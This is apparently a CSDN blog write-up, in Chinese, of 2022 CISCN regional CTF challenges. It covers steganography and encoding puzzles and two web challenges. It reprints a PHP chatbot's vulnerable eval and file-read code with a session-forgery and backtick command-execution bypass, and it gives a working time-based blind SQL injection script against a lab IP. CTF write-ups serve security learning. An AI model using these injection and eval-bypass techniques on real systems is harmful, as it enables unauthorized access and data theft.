2022CISCN华东北复现

最新推荐文章于 2024-06-25 17:02:24 发布

XINO丶

最新推荐文章于 2024-06-25 17:02:24 发布

阅读量771

点赞数 1

分类专栏： ctf 文章标签： php 网络安全安全 web安全

本文链接：https://blog.csdn.net/qq_52988816/article/details/126166538

版权

ctf 专栏收录该内容

8 篇文章 0 订阅

订阅专栏

本文探讨了一篇博客中关于Pikachu发现的lsb隐写术，涉及Base64解码、AES加密和CRC32爆破技术。作者分享了如何使用seteg和zsteg工具，以及通过上传操作获取管理员权限的过程，最后揭示了flag的解码过程。

摘要由CSDN通过智能技术生成

pikachu

stegsolve查看发现lsb隐写，红蓝绿通道有加密字符串，这里用seteg一把梭应该也可以

cGkgcGkgcGkgcGkgcGkgcGkgcGkgcGkgcGkgcGkgcGlrYSBwaXBpIHBpIHBpcGkgcGkgcGkgcGkgcGlwaSBwaSBwaSBwaSBwaSBwaSBwaSBwaSBwaXBpIHBpIHBpIHBpIHBpIHBpIHBpIHBpIHBpIHBpIHBpIHBpY2h1IHBpY2h1IHBpY2h1IHBpY2h1IGthIGNodSBwaXBpIHBpcGkgcGlwaSBwaXBpIHBpIHBpIHBpa2FjaHUgcGkgcGkgcGkgcGkgcGkgcGkgcGlrYWNodSBrYSBrYSBrYSBrYSBrYSBrYSBrYSBrYSBrYSBrYSBrYSBwaWthY2h1IHBpIHBpIHBpIHBpIHBpIHBpIHBpa2FjaHUgcGkgcGkgcGkgcGkgcGkgcGkgcGkgcGkgcGkgcGkgcGkgcGkgcGkgcGkgcGkgcGkgcGkgcGkgcGkgcGkgcGlrYWNodSBrYSBrYSBrYSBrYSBrYSBrYSBrYSBrYSBrYSBrYSBrYSBrYSBrYSBrYSBrYSBrYSBrYSBrYSBrYSBrYSBrYSBrYSBrYSBwaWthY2h1IHBpY2h1IGthIGthIGthIGthIGthIGthIGthIGthIGthIGthIGthIGthIGthIGthIGthIGthIHBpa2FjaHUga2Ega2Ega2Ega2EgcGlrYWNodSBwaSBwaSBwaWthY2h1IHBpIHBpIHBpa2FjaHUgcGlwaSBwaWthY2h1IHBpY2h1IGthIGthIGthIGthIGthIHBpa2FjaHUgcGlwaSBwaSBwaSBwaWthY2h1IHBpY2h1IHBpIHBpIHBpIHBpa2FjaHUga2Ega2Ega2EgcGlrYWNodSBwaXBpIHBpa2FjaHUga2Ega2Ega2Ega2Ega2EgcGlrYWNodSBwaSBwaSBwaSBwaWthY2h1IHBpY2h1IGthIHBpa2FjaHUgcGkgcGkgcGkgcGlrYWNodSBrYSBwaWthY2h1IHBpcGkgcGkgcGlrYWNodSBwaWthY2h1IHBpY2h1IHBpIHBpa2FjaHUga2Ega2Ega2EgcGlrYWNodSBwaSBwaWthY2h1IHBpIHBpIHBpIHBpIHBpIHBpIHBpIHBpIHBpa2FjaHUga2Ega2Ega2Ega2Ega2Ega2EgcGlrYWNodSBwaXBpIHBpIHBpa2FjaHUgcGljaHUgcGlrYWNodSBwaXBpIGthIGthIGthIGthIGthIHBpa2FjaHUgcGkgcGkgcGkgcGkgcGkgcGlrYWNodSBwaWNodSBrYSBrYSBwaWthY2h1IHBpIHBpIHBpIHBpIHBpa2FjaHUga2EgcGlrYWNodSBrYSBrYSBrYSBrYSBwaWthY2h1IHBpIHBpIHBpIHBpIHBpIHBpIHBpIHBpIHBpa2FjaHUgcGlwaSBwaSBwaSBwaSBwaSBwaSBwaSBwaSBwaSBwaSBwaSBwaSBwaSBwaSBwaSBwaSBwaSBwaSBwaSBwaSBwaSBwaSBwaSBwaSBwaWthY2h1IA==

感觉像base64,解码

pi pi pi pi pi pi pi pi pi pi pika pipi pi pipi pi pi pi pipi pi pi pi pi pi pi pi pipi pi pi pi pi pi pi pi pi pi pi pichu pichu pichu pichu ka chu pipi pipi pipi pipi pi pi pikachu pi pi pi pi pi pi pikachu ka ka ka ka ka ka ka ka ka ka ka pikachu pi pi pi pi pi pi pikachu pi pi pi pi pi pi pi pi pi pi pi pi pi pi pi pi pi pi pi pi pikachu ka ka ka ka ka ka ka ka ka ka ka ka ka ka ka ka ka ka ka ka ka ka ka pikachu pichu ka ka ka ka ka ka ka ka ka ka ka ka ka ka ka ka pikachu ka ka ka ka pikachu pi pi pikachu pi pi pikachu pipi pikachu pichu ka ka ka ka ka pikachu pipi pi pi pikachu pichu pi pi pi pikachu ka ka ka pikachu pipi pikachu ka ka ka ka ka pikachu pi pi pi pikachu pichu ka pikachu pi pi pi pikachu ka pikachu pipi pi pikachu pikachu pichu pi pikachu ka ka ka pikachu pi pikachu pi pi pi pi pi pi pi pi pikachu ka ka ka ka ka ka pikachu pipi pi pikachu pichu pikachu pipi ka ka ka ka ka pikachu pi pi pi pi pi pikachu pichu ka ka pikachu pi pi pi pi pikachu ka pikachu ka ka ka ka pikachu pi pi pi pi pi pi pi pi pikachu pipi pi pi pi pi pi pi pi pi pi pi pi pi pi pi pi pi pi pi pi pi pi pi pi pikachu

pi ka chu解码
https://www.dcode.fr/pikalang-language

snowberg

010看下crc错报，看了下有加密字符串aes

U2FsdGVkX1+mMxrc0YkGvTaB0c3A9EgFWvjghqa8j+J4vs0SO8q4qXO+OfKOIih+zOwLBe64L23McubUTe1dxA==

但没有密钥解不开
之后zsteg发现lsb隐写，有个压缩包，save bin

4个文件，需要密码
在这里插入图片描述做过类似题的我们就可以进行CRC32爆破
脚本地址
https://github.com/theonlypwner/crc32
挨个爆破得到key

y0u_f0und_th1s_k3y

解码就行

old

base-rot13-W型栅栏3栏
直接一把梭就行

welcomeToCiscn

F12源码查看flag,在/flag目录里面就是flag

会聊天的ctf机器人

image任意文件读读api.php源码

```php<?phpinit();function init(){    $sesspath = "/tmp/session";    session_save_path($sesspath);    session_start();    if (!$_SESSION['cname'])        $_SESSION['cname'] = 'ck';    if(!file_dir_exists("/tmp/resource"))        mkdir("/tmp/resource");}
function file_dir_exists($path){    $dir = dir($path);    if ($dir)        if ($dir->read())            return true;    return is_file($path);}
function getres($input){    log_write($input);    chdir("/tmp/resource/");    $path = $_SESSION['cname'];    if(!file_dir_exists($path)){        return "è¯·å…ˆä¸Šä¼ è¯åº“æ–‡ä»¶ã€‚";    }    $ck = json_decode(file_get_contents($path),true);    foreach ($ck as $key => $value){        if (strstr($key,$input) or strstr($input,$key)){            $type = key($value);            $v = $value[$type];            switch ($type){                case "string":                    return $v;                case "image":                    $b64img = '<img src="data:image/png;base64,'.base64_encode(file_get_contents($v)) . '"/>';                    return $b64img;                case "calc":                    if ($_SESSION['is_admin']){                        if (preg_match("/\(|\)|\'|\"/im",$v)){                            return "åŒ…å«éžæ³•å—ç¬¦";                        }                        return eval("return $v;");                    }else{                        return "adminæ‰èƒ½ä½¿ç”¨è¿™ä¸ªåŠŸèƒ½";                    }                default:                    return "è¿™ä¸ªåŠ¨ä½œæš‚æ—¶è¿˜æ²¡èƒ½å®žçŽ°";            }
        }    }    return "æ²¡æœ‰åŒ¹é…åˆ°è¯åº“æ¶ˆæ¯";}
function uploadc(){    $data = $_POST['uploadc'];    $filename = $_POST['cname'];    $resourcedir = "/tmp/resource/";    if(!file_dir_exists($resourcedir))        mkdir($resourcedir);    if(strpos($data,"<")){        die("åˆ«è¿™æ ·ï¼");    }    if(strpos($filename,".")){        die("åˆ«è¿™æ ·ï¼");    }    $_SESSION['cname'] = $filename;    if(file_put_contents($resourcedir.$filename,$data)) {        return "ä¸Šä¼ æˆåŠŸ";    }else{        return "ä¸Šä¼ å¤±è´¥";    }}function log_write($msg){    $logpath = "log.txt";    $oper = session_id();    $opername = substr($oper,0,1) ;    for ($i=0;$i <= strlen($oper);$i++)        $opername .= "*";    file_put_contents($logpath,"$opername : $msg \n",FILE_APPEND);}
if(isset($_POST['input']))    echo getres($_POST['input']);if(isset($_POST['uploadc']))    echo uploadc();if(isset($_POST['clear']))    file_put_contents("log.txt","");if(isset($_GET['log']))echo file_get_contents("log.txt");

通过upload写session文件，获取admin权限
代码执行过滤了括号和引号直接反引号绕过
执行命令就可以了

ezsql

错报注入，没有任何过滤，注意字段当前数据库与本站数据库不同，需要反引号明确字段，否则不太行

import requests
url='http://192.168.166.131:58004/app/deleteaccount_status.php?account_status_number='
flag=''
for i in range(1,55):
    m=32
    n=127
    while 1:
        mid=(m+n)//2
        #payload="1'or if (ascii(substr((select group_concat(schema_name) from information_schema.schemata),{},1))<{},sleep(1),0)%23".format(i,mid)#ctfshow_flagxc,ctfshow_info
        #mysql,information_schema,performance_schema,sys,mims,f0ig_wdp435s

        #payload="1'or if (ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema='f0ig_wdp435s'),{},1))<{},sleep(1),0)%23".format(i,mid)
        #account_status,account_type,accounts,customers,customers_sNpe,users

        #payload="1'or if (ascii(substr((select group_concat(column_name) from information_schema.columns where table_name='fllaaagggg'),{},1))<{},sleep(1),0)%23".format(i,mid)
        # FI@g

        payload="1'or if(ascii(substr((select `FI@g` from f0ig_wdp435s.fllaaagggg),{},1))<{},sleep(1),0)%23".format(i,mid)
        print(url+payload)
        try:
            r=requests.get(url=url+payload,timeout=2)
            m=mid
        except:
            n=mid
        if(m+1==n):
            flag+=chr(m)
            print(flag)
            break